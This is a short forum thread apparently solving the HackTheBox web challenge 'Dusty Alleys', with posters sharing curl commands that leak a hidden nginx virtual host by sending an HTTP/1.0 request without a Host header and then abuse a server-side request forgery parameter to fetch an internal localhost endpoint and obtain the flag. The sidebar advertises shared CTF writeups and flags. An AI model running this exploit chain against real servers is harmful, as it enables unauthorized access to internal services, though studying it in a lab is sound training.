HTB - Dusty Alleys
by x1rx - Saturday March 29, 2025 at 09:17 AM
#1
Let's solve together
Reply
#2
Vuln https://security.snyk.io/vuln/SNYK-JS-NODEFETCH-2342118
Reply
#3
1 - nginx http1.0 information leak
2 - ssrf
Reply
#4
What is the parameter to use?
Reply
#5
#get vhost by downgrade to http1.0
curl http://$IP:$PORT/think --http1.0 -H 'Host:'

#get flag
curl http://$IP:$PORT/guardian?quote=http%3A%2F%2Flocalhost%3A1337%2Fthink -H 'Host: guardian.firstalleyontheleft.com'
Reply
#6
(Mar 30, 2025, 01:49 PM)ent0xE Wrote:
#get vhost by downgrade to http1.0
curl http://$IP:$PORT/think --http1.0 -H 'Host:'

#get flag
curl http://$IP:$PORT/guardian?quote=http%3A%2F%2Flocalhost%3A1337%2Fthink -H 'Host: guardian.firstalleyontheleft.com'

i dont understand the downgrading to expose the vhost, can you explain ?

(Mar 30, 2025, 03:28 PM)pop10189 Wrote:
(Mar 30, 2025, 01:49 PM)ent0xE Wrote:
#get vhost by downgrade to http1.0
curl http://$IP:$PORT/think --http1.0 -H 'Host:'

#get flag
curl http://$IP:$PORT/guardian?quote=http%3A%2F%2Flocalhost%3A1337%2Fthink -H 'Host: guardian.firstalleyontheleft.com'

i dont understand the downgrading to expose the vhost, can you explain ?

 Ohh nvm, now i understand In HTTP/1.0, the Host
header is optional. If the client does not send it, Nginx does not know which vhost to serve and will default to the first defined
server
block, which is: server_name alley.$SECRET_ALLEY
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 372 93,094 11 minutes ago
Last Post: yodaosin
Heart [FREE] HackTheBox All Cheatsheets Tamarisk 5 484 12 minutes ago
Last Post: yodaosin
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 22 2,665 59 minutes ago
Last Post: Akvlt
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 602 92,181 Yesterday, 06:48 PM
Last Post: sabero_exe
  [FREE] CPTS 12 FLAGS pulsebreaker 68 2,022 Yesterday, 09:54 AM
Last Post: VictorPipeau

Forum Jump:


 Users browsing this forum: 1 Guest(s)